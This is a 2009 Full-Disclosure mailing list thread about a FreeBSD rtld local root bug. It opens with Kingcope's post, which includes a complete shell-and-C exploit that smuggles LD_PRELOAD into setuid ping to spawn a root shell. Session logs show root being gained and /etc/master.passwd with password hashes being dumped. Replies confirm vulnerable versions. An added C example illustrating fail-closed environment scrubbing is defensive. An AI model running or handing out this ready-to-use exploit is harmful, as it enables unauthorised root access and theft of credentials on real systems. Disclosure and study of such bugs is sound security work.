I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.

The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like ping or su.
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.

Example exploiting session
**
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie :/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System :/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
:/home/kcope:/bin/sh
#

Systems tested/affected
**
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

*EXPLOIT*

#!/bin/sh
# Builds env (a launcher that hands ping a hand-made environment) and
# w00t.so.1.0 (a shared object whose _init starts a shell), then runs env.
echo "** FreeBSD local r00t zeroday"
echo "by Kingcope"
echo "November 2009"
cat > env.c << _EOF
#include <stdio.h>
#include <stdlib.h>   /* malloc(3); without these three headers gcc emits the */
#include <string.h>   /* strcpy(3)  implicit-declaration warnings seen in the */
#include <unistd.h>   /* execl(2)   sessions above */

int main(void) {
    extern char **environ;
    /* Replace the process environment with a hand-built array: slot 0 is
     * allocated but never filled in, slot 1 carries LD_PRELOAD. */
    environ = (char**)malloc(8096);

    environ[0] = (char*)malloc(1024);
    environ[1] = (char*)malloc(1024);
    strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

    /* Exec a set-user-ID root binary under that environment. */
    execl("/sbin/ping", "ping", (char *)0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

/* Runs when the shared object is loaded (-nostartfiles omits the default
 * crti/crtn, so the object supplies its own _init).  environ is cleared
 * so the shell inherits nothing from the loader. */
void _init() {
    extern char **environ;
    environ = NULL;
    system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

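Added example, not from Kingcope's post and not FreeBSD's rtld or libc source: the sessions above show libc complaining "environment corrupt; missing value for" about an environment entry with no '=' while a set-user-ID binary still honours LD_PRELOAD. The C below models that failure mode with constructed environments. A scrubber that discards the result of its unset operation leaves LD_PRELOAD in place yet reports success; one that treats any unset failure as fatal refuses to continue. The function names (env_unset, scrub_lenient, scrub_strict), the list of dangerous variables and the sample environments are assumptions made for this illustration.

```c
/*
 * Added example, not FreeBSD rtld/libc code: why a privileged loader must
 * fail closed when scrubbing an untrusted environment.  Names and sample
 * environments are constructed for this illustration.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Variables a set-user-ID program must not inherit (illustrative list). */
static const char *const dangerous_vars[] = {
    "LD_PRELOAD", "LD_LIBRARY_PATH", "LD_LIBMAP", NULL
};

/* 1 if env contains an entry "name=...", else 0. */
static int env_has(char *const *env, const char *name)
{
    size_t n = strlen(name);
    for (size_t i = 0; env[i] != NULL; i++)
        if (strncmp(env[i], name, n) == 0 && env[i][n] == '=')
            return 1;
    return 0;
}

/* Check every entry before changing anything.  An entry without '=' is
 * the condition reported as "environment corrupt; missing value for" in
 * the sessions above; here it fails the whole operation. */
static int env_validate(char *const *env)
{
    for (size_t i = 0; env[i] != NULL; i++)
        if (strchr(env[i], '=') == NULL) {
            fprintf(stderr, "environment corrupt; missing value for %s\n", env[i]);
            return -1;
        }
    return 0;
}

/* Remove "name=..." from env in place.  Returns -1 and leaves env
 * untouched if the environment does not validate. */
static int env_unset(char **env, const char *name)
{
    if (env_validate(env) != 0)
        return -1;
    size_t n = strlen(name), w = 0;
    for (size_t r = 0; env[r] != NULL; r++)
        if (!(strncmp(env[r], name, n) == 0 && env[r][n] == '='))
            env[w++] = env[r];
    env[w] = NULL;
    return 0;
}

/* Lenient: ignore env_unset's result.  On a corrupt environment nothing
 * is removed, yet the caller is told everything is fine. */
static int scrub_lenient(char **env)
{
    for (size_t i = 0; dangerous_vars[i] != NULL; i++)
        (void)env_unset(env, dangerous_vars[i]);
    return 0;
}

/* Strict: a failed unset is fatal, so the privileged program never runs
 * with an environment it could not clean. */
static int scrub_strict(char **env)
{
    for (size_t i = 0; dangerous_vars[i] != NULL; i++)
        if (env_unset(env, dangerous_vars[i]) != 0)
            return -1;
    return 0;
}

/* Constructed environment shaped like the one env.c above builds: an empty
 * first entry, then the real LD_PRELOAD.  Returns 1 when the lenient
 * scrubber reports success although LD_PRELOAD survives. */
static int lenient_on_corrupt_env(void)
{
    char *env[] = { "", "LD_PRELOAD=/tmp/w00t.so.1.0", "HOME=/home/user", NULL };
    return scrub_lenient(env) == 0 && env_has(env, "LD_PRELOAD");
}

/* Same constructed environment; the strict scrubber refuses with -1. */
static int strict_on_corrupt_env(void)
{
    char *env[] = { "", "LD_PRELOAD=/tmp/w00t.so.1.0", "HOME=/home/user", NULL };
    return scrub_strict(env);
}

/* Well-formed environment: strict scrubbing drops LD_PRELOAD and keeps HOME. */
static int strict_on_clean_env(void)
{
    char *env[] = { "LD_PRELOAD=/tmp/w00t.so.1.0", "HOME=/home/user", NULL };
    return scrub_strict(env) == 0 && !env_has(env, "LD_PRELOAD") && env_has(env, "HOME");
}

int main(void)
{
    printf("lenient on corrupt env, LD_PRELOAD kept: %d\n", lenient_on_corrupt_env());
    printf("strict on corrupt env, rc: %d\n", strict_on_corrupt_env());
    printf("strict on clean env, cleaned: %d\n", strict_on_clean_env());
    return 0;
}
```

The strict variant is the behaviour a privileged loader wants: if it cannot prove the inherited environment clean, the only safe answer is to refuse to run the program rather than guess.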


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread Ed Carp
On 11/30/09, Kingcope kco...@googlemail.com wrote:

 Systems tested/affected
 **
 FreeBSD 8.0-RELEASE *** VULNERABLE
 FreeBSD 7.1-RELEASE *** VULNERABLE
 FreeBSD 6.3-RELEASE *** NOT VULN
 FreeBSD 4.9-RELEASE *** NOT VULN

Glad I still run 6.3!  How about 6.4?



Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread phantomcircuit
Confirmed on 7.2-RELEASE-p4 fully patched according to freebsd-update.

%sh exploit.sh
Desktop env env.c exploit exploit.c exploit.sh payload.c payload.o 
private program.c program.o public public_html run.sh w00t.so.1.0 
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 
'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 
'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in 
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# id
uid=1001(phantomcircuit) gid=20(staff) euid=0(root) 
groups=20(staff),0(wheel)
# uname -a
FreeBSD phantomcircuit.mine.nu 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4 #0: 
Fri Oct  2 12:21:39 UTC 2009 
r...@i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  i386
#



Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread Benji
7.0 not vuln.

On Mon, Nov 30, 2009 at 10:49 PM, Ed Carp e...@pobox.com wrote:

 On 11/30/09, Kingcope kco...@googlemail.com wrote:

  Systems tested/affected
  **
  FreeBSD 8.0-RELEASE *** VULNERABLE
  FreeBSD 7.1-RELEASE *** VULNERABLE
  FreeBSD 6.3-RELEASE *** NOT VULN
  FreeBSD 4.9-RELEASE *** NOT VULN

 Glad I still run 6.3!  How about 6.4?



Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread Cody Robertson
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


On Nov 30, 2009, at 6:31 PM, phantomcircuit wrote:

 Confirmed on 7.2-RELEASE-p4 fully patched according to freebsd-update.

 %sh exploit.sh
 Desktop env env.c exploit exploit.c exploit.sh payload.c payload.o
 private program.c program.o public public_html run.sh w00t.so.1.0
 FreeBSD local r00t zeroday
 by Kingcope
 November 2009
 env.c: In function 'main':
 env.c:5: warning: incompatible implicit declaration of built-in  
 function
 'malloc'
 env.c:9: warning: incompatible implicit declaration of built-in  
 function
 'strcpy'
 env.c:11: warning: incompatible implicit declaration of built-in
 function 'execl'
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 ALEX-ALEX
 # id
 uid=1001(phantomcircuit) gid=20(staff) euid=0(root)
 groups=20(staff),0(wheel)
 # uname -a
 FreeBSD phantomcircuit.mine.nu 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4  
 #0:
 Fri Oct  2 12:21:39 UTC 2009
 r...@i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  i386
 #


7.2-RELEASE

[co...@popo ~]$ ./env
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
#

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (Darwin)

iEYEARECAAYFAksUYGkACgkQAr2PPaFwRupDPQCcDtqiPyNof9ST2gLjJBw8pNMM
nMQAn0ynrghE5hrzeuIWVIdZg5N5N1hT
=HN3D
-END PGP SIGNATURE-



Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread Ryan Steinmetz
6.4-RELEASE not vuln

On (11/30/09 22:51), Benji wrote:
 7.0 not vuln.
 
 On Mon, Nov 30, 2009 at 10:49 PM, Ed Carp e...@pobox.com wrote:
 
  On 11/30/09, Kingcope kco...@googlemail.com wrote:
 
   Systems tested/affected
   **
   FreeBSD 8.0-RELEASE *** VULNERABLE
   FreeBSD 7.1-RELEASE *** VULNERABLE
   FreeBSD 6.3-RELEASE *** NOT VULN
   FreeBSD 4.9-RELEASE *** NOT VULN
 
  Glad I still run 6.3!  How about 6.4?
 
 



-- 
Ryan Steinmetz
Lead Security/Systems Administrator
Infrastructure Engineering
Rochester Institute of Technology
585.475.5663
PGP: EF36 D45A 5CA9 28B1 A550  18CD A43C D111 7AD7 FAF2



Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread David Berard
 7.0 not vuln.

7.0 vulnerable here,

$ ./env 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
ALEX-ALEX
# uname -r
7.0-RELEASE-p3

 
 On Mon, Nov 30, 2009 at 10:49 PM, Ed Carp erc at pobox.com wrote:
 
 On 11/30/09, Kingcope kcope2 at googlemail.com wrote:
 
 Systems tested/affected
 **
 FreeBSD 8.0-RELEASE *** VULNERABLE
 FreeBSD 7.1-RELEASE *** VULNERABLE
 FreeBSD 6.3-RELEASE *** NOT VULN
 FreeBSD 4.9-RELEASE *** NOT VULN
 
 Glad I still run 6.3!  How about 6.4?
 
 


--
David BERARD
-
contact(at)davidberard.fr
GPG|PGP KeyId 0xC8533354
GPG|PGP Key http://davidberard.fr/C8533354.gpgkey
-
*  No electrons were harmed in  *
* the transmission of this email*




Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread bk


On Nov 30, 2009, at 9:25 PM, David Berard wrote:

 7.0 not vuln.
 
 7.0 vulnerable here,
 
 $ ./env 
 /libexec/ld-elf.so.1: environment corrupt; missing value for 
 /libexec/ld-elf.so.1: environment corrupt; missing value for 
 /libexec/ld-elf.so.1: environment corrupt; missing value for 
 /libexec/ld-elf.so.1: environment corrupt; missing value for 
 /libexec/ld-elf.so.1: environment corrupt; missing value for 
 ALEX-ALEX
 # uname -r
 7.0-RELEASE-p3

Here as well:

bin/Kingcope.sh: new file: 35 lines, 772 characters.
[ch...@demon ~]$ chmod +x bin/Kingcope.sh 
[ch...@demon ~]$ Kingcope.sh 
bin ktrace.out scratch vent_stalk FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 
'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 
'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 
'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
ALEX-ALEX
# whoami
root
# uname -a
FreeBSD demon.smtps.net 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 
UTC 2008 r...@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386

It's a VM if that matters.

--
chort
